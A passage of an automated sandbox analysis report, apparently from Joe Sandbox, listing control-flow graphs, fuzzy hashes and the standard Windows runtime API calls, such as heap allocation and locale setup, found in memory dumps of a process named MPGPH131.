                                  • Instruction Fuzzy Hash: EA31E5E710C121BDBE49D1952B68AF7676FF6D27307318C2BF80BC65A2E39C4A4940B1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 328 b04942-b0494f 329 b04951-b04974 call b04723 328->329 330 b04979-b0498d call b15f82 328->330 335 b04ae0-b04ae2 329->335 336 b04992-b0499b call b0e11f 330->336 337 b0498f 330->337 339 b049a0-b049af 336->339 337->336 340 b049b1 339->340 341 b049bf-b049c8 339->341 342 b049b7-b049b9 340->342 343 b04a89-b04a8e 340->343 344 b049ca-b049d7 341->344 345 b049dc-b04a10 341->345 342->341 342->343 346 b04ade-b04adf 343->346 347 b04adc 344->347 348 b04a12-b04a1c 345->348 349 b04a6d-b04a79 345->349 346->335 347->346 350 b04a43-b04a4f 348->350 351 b04a1e-b04a2a 348->351 352 b04a90-b04a93 349->352 353 b04a7b-b04a82 349->353 350->352 356 b04a51-b04a6b call b04e59 350->356 351->350 355 b04a2c-b04a3e call b04cae 351->355 354 b04a96-b04a9e 352->354 353->343 357 b04aa0-b04aa6 354->357 358 b04ada 354->358 355->346 356->354 361 b04aa8-b04abc call b04ae3 357->361 362 b04abe-b04ac2 357->362 358->347 361->346 366 b04ac4-b04ad2 call b24a10 362->366 367 b04ad5-b04ad7 362->367 366->367 367->358
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a66a76805cb1cdfe67d827dc33810e92775d23ac94a8e1b1f0d9303fe48d9589
                                  • Instruction ID: d95b735c852b77f9497c557fc0eaa37f114cc707a5c9b2b13344ef91c7e86b56
                                  • Opcode Fuzzy Hash: a66a76805cb1cdfe67d827dc33810e92775d23ac94a8e1b1f0d9303fe48d9589
                                  • Instruction Fuzzy Hash: D551A7B0B00208AFDF14CF58CC85AAA7FF5EF45354F248198F9499B292D3719E41CB94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 371 a90560-a9057f 372 a906a9 call a22270 371->372 373 a90585-a90598 371->373 377 a906ae call a221d0 372->377 374 a9059a 373->374 375 a905c0-a905c8 373->375 380 a9059c-a905a1 374->380 378 a905ca-a905cf 375->378 379 a905d1-a905d5 375->379 385 a906b3-a906b8 call b047b0 377->385 378->380 382 a905d9-a905e1 379->382 383 a905d7 379->383 384 a905a4-a905a5 call aff290 380->384 386 a905f0-a905f2 382->386 387 a905e3-a905e8 382->387 383->382 389 a905aa-a905af 384->389 392 a90601 386->392 393 a905f4-a905ff call aff290 386->393 387->377 391 a905ee 387->391 389->385 394 a905b5-a905be 389->394 391->384 397 a90603-a90629 392->397 393->397 394->397 399 a9062b-a90655 call b00f70 call b014f0 397->399 400 a90680-a906a6 call b00f70 call b014f0 397->400 409 a90669-a9067d call aff511 399->409 410 a90657-a90665 399->410 410->385 411 a90667 410->411 411->409
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A906AE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction ID: 3ced867fdc23f4da8080688d01e28476eb7b291a2c70bcccc270a4040337e8a7
                                  • Opcode Fuzzy Hash: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction Fuzzy Hash: AF410372A001189FCF15EF68DD80AAE7BE5AF89380F1541A9F905EB342D770DD209BE1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 414 b14b12-b14b26 call b1a6de 417 b14b28-b14b2a 414->417 418 b14b2c-b14b34 414->418 419 b14b7a-b14b9a call b1a64d 417->419 420 b14b36-b14b3d 418->420 421 b14b3f-b14b42 418->421 431 b14bac 419->431 432 b14b9c-b14baa call b0d208 419->432 420->421 423 b14b4a-b14b5e call b1a6de * 2 420->423 424 b14b60-b14b70 call b1a6de FindCloseChangeNotification 421->424 425 b14b44-b14b48 421->425 423->417 423->424 424->417 435 b14b72-b14b78 424->435 425->423 425->424 433 b14bae-b14bb1 431->433 432->433 435->419
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00B149F9,00000000,CF830579,00B51140,0000000C,00B14AB5,00B08BBD,?), ref: 00B14B68
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: da726f92038f32a88c97c5b675a5d40f20a3d73fa3e6ce0047f95dab7679f814
                                  • Instruction ID: b2cc99f95b912349ae927e614c3dc3152ff49a96074a327204e0708cd5ac8b63
                                  • Opcode Fuzzy Hash: da726f92038f32a88c97c5b675a5d40f20a3d73fa3e6ce0047f95dab7679f814
                                  • Instruction Fuzzy Hash: DB114433A4922416D6242674A845BFF77D9CB827B0FB902CDF8088B0C2EF60F8C25155

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 440 b0e05c-b0e074 call b1a6de 443 b0e076-b0e07d 440->443 444 b0e08a-b0e0a0 SetFilePointerEx 440->444 445 b0e084-b0e088 443->445 446 b0e0a2-b0e0b3 call b0d208 444->446 447 b0e0b5-b0e0bf 444->447 449 b0e0db-b0e0de 445->449 446->445 447->445 448 b0e0c1-b0e0d6 447->448 448->449
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00B50DF8,00A2A3EB,00000002,00A2A3EB,00000000,?,?,?,00B0E166,00000000,?,00A2A3EB,00000002,00B50DF8), ref: 00B0E098
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: f6aeec18fb61651c7c633c014155d71b755f73910b85c4dc4f33ceb1529b37a7
                                  • Instruction ID: 38d21af2223b360aff4b3d87bab5d08debf3d4f616f0421a66d914fec239ec28
                                  • Opcode Fuzzy Hash: f6aeec18fb61651c7c633c014155d71b755f73910b85c4dc4f33ceb1529b37a7
                                  • Instruction Fuzzy Hash: FB01D632614215AFCF159F59CC46C9E3FAADB81320B240689F8A09B2D1FAB1ED41DBD0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 453 aff290-aff293 454 aff2a2-aff2a5 call b0df2c 453->454 456 aff2aa-aff2ad 454->456 457 aff2af-aff2b0 456->457 458 aff295-aff2a0 call b117d8 456->458 458->454 461 aff2b1-aff2b5 458->461 462 a221d0-a22220 call a221b0 call b00efb call b00651 461->462 463 aff2bb 461->463 463->463
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A2220E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 5cafe8bfb2d3bcea12107c62a93f18105c9add137713c81c5c2a060ea11ac3a3
                                  • Instruction ID: 79f8b9c1d30464d9308d5327f2deb359ddcdac209f3203315d5acd858aebf106
                                  • Opcode Fuzzy Hash: 5cafe8bfb2d3bcea12107c62a93f18105c9add137713c81c5c2a060ea11ac3a3
                                  • Instruction Fuzzy Hash: A301DB7650030DBBCB14AFD8E801AA97BECDE00310F508575FB1CDB691E770E9548791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 470 b163f3-b163fe 471 b16400-b1640a 470->471 472 b1640c-b16412 470->472 471->472 473 b16440-b1644b call b0d23f 471->473 474 b16414-b16415 472->474 475 b1642b-b1643c RtlAllocateHeap 472->475 479 b1644d-b1644f 473->479 474->475 476 b16417-b1641e call b13f93 475->476 477 b1643e 475->477 476->473 483 b16420-b16429 call b117d8 476->483 477->479 483->473 483->475
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00B091F7,00000000,?,00B15D79,00000001,00000364,00000000,00000006,000000FF,?,00000000,00B0D244,00B089C3,00B091F7,00000000), ref: 00B16434
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: f9b7cb1e82295501ef5d8dcf885e7fa1ca8161beaec2feb89a21e95a4daad543
                                  • Instruction ID: 59ef0b6240c4488ee893e934ea2466738870c649178104c431c883da00793057
                                  • Opcode Fuzzy Hash: f9b7cb1e82295501ef5d8dcf885e7fa1ca8161beaec2feb89a21e95a4daad543
                                  • Instruction Fuzzy Hash: BFF0893254522466DB216B66DC17BDB7BC9EF41B64BA580E5BC04A73D0CF30EC9186F1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 486 b16e2d-b16e39 487 b16e6b-b16e76 call b0d23f 486->487 488 b16e3b-b16e3d 486->488 495 b16e78-b16e7a 487->495 490 b16e56-b16e67 RtlAllocateHeap 488->490 491 b16e3f-b16e40 488->491 492 b16e42-b16e49 call b13f93 490->492 493 b16e69 490->493 491->490 492->487 498 b16e4b-b16e54 call b117d8 492->498 493->495 498->487 498->490
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,00B1D635,4D88C033,?,00B1D635,00000220,?,00B157EF,4D88C033), ref: 00B16E5F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 2e782990140c1738193b61aa501f0c48256bfe3f1f6da202176a2eccde4f56e9
                                  • Instruction ID: ce7572f552d3fc374cdf44185deadfe252e76fd786c7ff1d9d1bc52f1f2b9514
                                  • Opcode Fuzzy Hash: 2e782990140c1738193b61aa501f0c48256bfe3f1f6da202176a2eccde4f56e9
                                  • Instruction Fuzzy Hash: AAE0ED3B14162166DE3022A5EC01BDBBBCCDF927A0FD603E1BC04A20E0CF20CC8085A4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction ID: b36872ecee027f9b2e13e39631d5047c33f18f73355c9767f5dbf65828867afd
                                  • Opcode Fuzzy Hash: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction Fuzzy Hash: CD023C71E012199FDF14CFA9C8806AEBBF1FF48314F2582A9D559A7381DB31AA41CB90
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8F833
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8F855
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8F875
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8F89F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8F90D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A8F959
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A8F973
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8FA08
                                  • std::_Facet_Register.LIBCPMT ref: 00A8FA15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name$Ps
                                  • API String ID: 3375549084-1174896957
                                  • Opcode ID: 85677738708a11aaa5536fc60d48c91c86dfe125da6f352c0110fd4ca171b247
                                  • Instruction ID: 5974b296e22c07219ceef40324bc785aea48628a4af3d3b1fddda3ce0cfdd4f8
                                  • Opcode Fuzzy Hash: 85677738708a11aaa5536fc60d48c91c86dfe125da6f352c0110fd4ca171b247
                                  • Instruction Fuzzy Hash: 54618F71E002099FEF11EFA4D945BAEBBF4AF14310F1440A8E805AB391EB74ED05CBA1
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A23A58
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A23AA4
                                  • __Getctype.LIBCPMT ref: 00A23ABA
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A23AE6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A23B7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 1840309910-1405518554
                                  • Opcode ID: 74e65b7e673854d32779c1f51adf772b879d26921c27c9682b210d0a3a5cd52a
                                  • Instruction ID: 479f40d9e70d441b03722aa1bd24390058f5274e4fdd8c59803a4aeff71e7b9a
                                  • Opcode Fuzzy Hash: 74e65b7e673854d32779c1f51adf772b879d26921c27c9682b210d0a3a5cd52a
                                  • Instruction Fuzzy Hash: 755141B2D012589FDF10DFE8D945B9EBBF8AF15310F144069E909AB381E779DA04CB91
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00B02E47
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00B02E4F
                                  • _ValidateLocalCookies.LIBCMT ref: 00B02ED8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00B02F03
                                  • _ValidateLocalCookies.LIBCMT ref: 00B02F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
